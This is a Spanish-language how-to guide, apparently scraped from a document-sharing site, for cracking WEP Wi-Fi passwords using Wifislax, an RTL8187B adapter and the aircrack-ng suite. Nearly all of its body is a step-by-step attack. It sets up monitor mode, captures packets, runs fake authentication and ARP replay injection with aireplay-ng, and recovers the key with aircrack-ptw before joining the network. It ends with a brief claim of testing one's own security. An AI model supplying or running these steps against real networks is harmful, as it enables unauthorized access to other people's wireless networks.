Vous êtes sur la page 1sur 9

MANUAL HACKIN WIFI CON RTL8187B Y WIFISLAX

Una vez cargado este sistema operativo Linux, empec a intentar usar las herramientas para
ver que poda hacer. Sin xito. No detectaba la placa inalmbrica. Me di cuenta que el chip de
la placa era un RT8187B y el Wifislax no trae los drivers para esta placa (lo verifiqu utilizando
el Everest (http://www.lavalys.com/products.php?ps=UE&lang=en&page=9).
Reinicie la PC, cargue Windows y me puse a investigar arduamente en foros, a ver que
consegua. No tuve mucho xito, todos los foros decan que esa placa no iba a andar, que era
una basura. No haba ninguna explicacin. Al menos consegu los drivers de la placa para
Linux y decid que tena que intentar todo antes de rendirme, aparte quera investigar y me dio
mucha bronca que mi placa no fuera compatible (al menos eso dice en los foros). Aqu les dejo
los drivers:
http://www.mediafire.com/?sharekey=09919b3f76847bd675a4fc82078ae6c8e04e75f6e8ebb871
Los pedi directamente a uno de los encargados de software de realtek (lo contacte por mail con
mi spanglish, jojo)
Copie los drivers en una particion de mi disco C:/ (gracias a dios Wifislax monta
automticamente todas las unidades que detecta al inicio, aunque sean NTFS),

Mediante Windows busque la MAC ADD de la placa (la obtuve mediante la consola de DOS,
colocas ipconfig -all y la anotamos, nos tiene que dar un numero tipo 11:22:3T:44:F5:66,
pueden ser letras y nmeros) o sino directamente de las propiedades de la conexion
inalambrica

Reinicie la pc, volv a colocar el LiveCD, inicie nuevamente Wifislax y copie los drivers del disco
duro (/mnt/sda1) al directorio ROOT.

Abri una nueva consola y escrib:


(usualmente las consolas estn iniciadas en la carpeta root, en donde hemos guardado nuestro
archivo)
tar -xvf rtl8187B_linux_26.1052.0225.2009.release.tar.gz (el ultimo es el nombre del archivo,
si no lo cambiaron lo dejan as tal cual)

cd rtl8187B_linux_26.1052.0225.2009.release (con esto ingresamos al directorio donde estn


los drivers)

make (con este comando instalamos los drivers)

./wlan0up (y ahora "levantamos" nuestra placa)

iwconfig (verificamos que ya esta la placa y que todos los parmetros normales)

abrimos una nueva consola


airodump-ng wlan0 (con este comando vemos las redes que estan a nuestro alcance, con su
respectiva mac (bssid), canal (ch) y nombre (essid)

airmon-ng start wlan0 6 (de esta manera colocamos nuestra placa en modo monitor, para
poder monitorear las redes del canal 6 (#CH) Nos tiene que aparecer un mensaje diciendo que
ah esta en modo monitor

cerramos la consola y abrimos una nueva


airodump-ng w /mnt/sda1/pass c 6 wlan0 (de esta forma empezamos a monitorear las
redes del canal 6 y guardamos los resultados en la carpeta mnt que es donde se montan las
unidades. Yo la guardare en sda1 que es la unidad C: de Windows con el nombre de pass)

Si existe alguna estacin asociada al router podemos saltarnos este paso y en el siguiente
donde hay que poner la MACNUESTRA ponemos la del cliente actual.
abrimos una nueva consola y ponemos:
aireplay-ng -1 30 e NombreESSID a MACROUTER h MACNUESTRA wlan0 (con este
comando creamos una asociacin entre el router y la pc. Debemos intentar una y otra vez
hasta que nos aparezca association sucefull :-)

si todo va bien, deberamos ver algo as

abrimos otra consola y colocamos


aireplay-ng -3 x600 b MACROUTER h MACNUESTRA wlan0 (con esto comenzamos a
leer y enviar paquetes y recibir ARP y guardarlos)

una vez que tenemos una gran cantidad de IVs (#DATA) (en la pantalla que dejamos
funcionando en el paso anterior) (a una gran cantidad me refiero a arriba de 60.000 para claves
WEP de 64 bits, o sea 5 caracteres ASCII, o arriba de 150.000 para contraseas WEP de 128
bits o sea 13 caracteres ASCII)

abrimos una nueva consola y utilizaremos el siguiente comando


aircrack-ptw /mnt/sda1/pass-01.cap (aqu es donde habamos generado el archivo.
Ingresamos al directorio y nos fijamos cual de los archivos es el mas grande (en tamao kb) y
lo usaremos para averiguar la clave WEP en tan solo unos segundos, en este caso el mas
grande era el pass-01.cap)

Por arte de magia (y algoritmos que ningn mago puede explicar) en tan solo un segundo
obtuve la clave WEP en caracteres hexadecimales y ASCII. Pero estuve conectado unos 15
minutos.
Tambin pueden obtenerla mediante
aircrack-ng /mnt/sda1/pass-01.cap (tarda unos segundos mas) yo lo prob con los dos y dio
el mismo resultado

y configuramos la conexin
iwconfig wlan0 mode managed essid NOMBREDESSID key CLAVEWEP
ahora obtenemos una direccin IP (esto demora unos segundos)
dhcpcd wlan0
probamos un ping al router

y podemos probar nuestra conexin con un ping a Google por ejemplo

ping www.google.com
y ya estamos conectados!
Si no nos agrada navegar por Linux, reiniciamos la PC y cuando vamos a conectaros a la red y
nos pida la clave, colocamos la que nos dio el aircrack y listoooo!
Probe introducir una clave WEP de 128 bits (o sea 13 caracteres ASCII) y en 20 minutos la
obtuve, de la misma manera que la anterior. Espero les sirva para poder probar la seguridad de
sus redes.
En mi casa tengo puesta clave WPA2 y aun no la he podido descifrar con Wifislax, por lo que
me parece lo mas seguro del momento.

Vous aimerez peut-être aussi